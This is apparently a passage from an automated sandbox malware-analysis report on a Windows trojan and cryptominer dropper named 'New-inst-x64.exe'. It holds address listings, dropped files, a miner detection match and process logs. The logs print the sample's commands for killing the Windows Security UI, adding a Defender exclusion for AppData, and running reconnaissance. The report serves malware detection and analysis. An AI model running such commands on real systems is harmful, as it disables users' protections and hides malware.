      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043EB4029_2_0043EB40
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00407B5029_2_00407B50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043A35029_2_0043A350
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044035029_2_00440350
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041936029_2_00419360
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F831029_2_003F8310
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FA30029_2_003FA300
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F7B0029_2_003F7B00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043130F29_2_0043130F
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040B31029_2_0040B310
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041732029_2_00417320
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043132029_2_00431320
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004393D029_2_004393D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004593E029_2_004593E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041ABF029_2_0041ABF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042ABF029_2_0042ABF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040DB8029_2_0040DB80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00400B9029_2_00400B90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00401BA029_2_00401BA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040E3A029_2_0040E3A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004253A029_2_004253A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00447BB029_2_00447BB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040245029_2_00402450
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041545029_2_00415450
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043646029_2_00436460
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040EC7029_2_0040EC70
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00423C7029_2_00423C70
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00412C0029_2_00412C00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00451C0029_2_00451C00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00404C1029_2_00404C10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040D41029_2_0040D410
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042341029_2_00423410
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040443029_2_00404430
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040043029_2_00400430
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044343029_2_00443430
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044BCC029_2_0044BCC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004484C029_2_004484C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045A4C029_2_0045A4C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F54D029_2_003F54D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00434CB029_2_00434CB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F9D3029_2_003F9D30
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042B56029_2_0042B560
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00453D6029_2_00453D60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00419D0029_2_00419D00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044FD0029_2_0044FD00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044950029_2_00449500
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040351029_2_00403510
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042FD2029_2_0042FD20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FCD5029_2_003FCD50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040653029_2_00406530
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041353029_2_00413530
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004155C029_2_004155C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042F5D029_2_0042F5D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00427DD029_2_00427DD0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042DDD929_2_0042DDD9
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00400DE029_2_00400DE0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041B5F029_2_0041B5F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00437DF029_2_00437DF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00412D8029_2_00412D80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042DD8029_2_0042DD80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0047559229_2_00475592
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042C5A029_2_0042C5A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F8DD029_2_003F8DD0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045464029_2_00454640
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043965029_2_00439650
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00459E6029_2_00459E60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FC61029_2_003FC610
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00410E1029_2_00410E10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00457E1029_2_00457E10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FDE6029_2_003FDE60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040062029_2_00400620
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041FE2029_2_0041FE20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004076C029_2_004076C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042AEC029_2_0042AEC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F16B029_2_003F16B0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042D6E029_2_0042D6E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004286E029_2_004286E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043AEE029_2_0043AEE0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FE69029_2_003FE690
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F969029_2_003F9690
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004166F029_2_004166F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00432E8029_2_00432E80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FB6F029_2_003FB6F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044569029_2_00445690
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00433EA029_2_00433EA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00415EB029_2_00415EB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040974029_2_00409740
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00411F5029_2_00411F50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FBF1029_2_003FBF10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FA70029_2_003FA700
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00412F1029_2_00412F10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0047371829_2_00473718
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00403F2029_2_00403F20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00416FC029_2_00416FC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00442FC029_2_00442FC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004407F029_2_004407F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00436F9029_2_00436F90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044FF9029_2_0044FF90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F27E029_2_003F27E0
      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe 4DA98D39D64E332399A1B2EE3CBE4F07436A8B6FF9F35D41CCF0FF147F54D24C
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: String function: 0045DE10 appears 96 times
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: String function: 0046607C appears 44 times
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: String function: 0046AE24 appears 34 times
      Source: New-inst-x64.exe, 00000000.00000000.1175145172.0000000003B6D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameaethersuite.exe8 vs New-inst-x64.exe
      Source: New-inst-x64.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: dump.pcap, type: PCAP Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: Section: ZLIB complexity 0.9992485687022901
      Source: vbczvzznbmunxtn.exe.0.dr Static PE information: Section: .bss ZLIB complexity 1.0003259892086331
      Source: mbtbiqwunmmmyby.exe.0.dr, -Module-.cs Base64 encoded string: (encoded values removed)
      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@16219/23@0/4
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exeJump to behavior
      Source: New-inst-x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SecHealthUI.exe&quot;)
      Source: C:\Users\user\Desktop\New-inst-x64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile read: C:\Users\user\Desktop\New-inst-x64.exe
      Source: unknownProcess created: C:\Users\user\Desktop\New-inst-x64.exe "C:\Users\user\Desktop\New-inst-x64.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknown
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
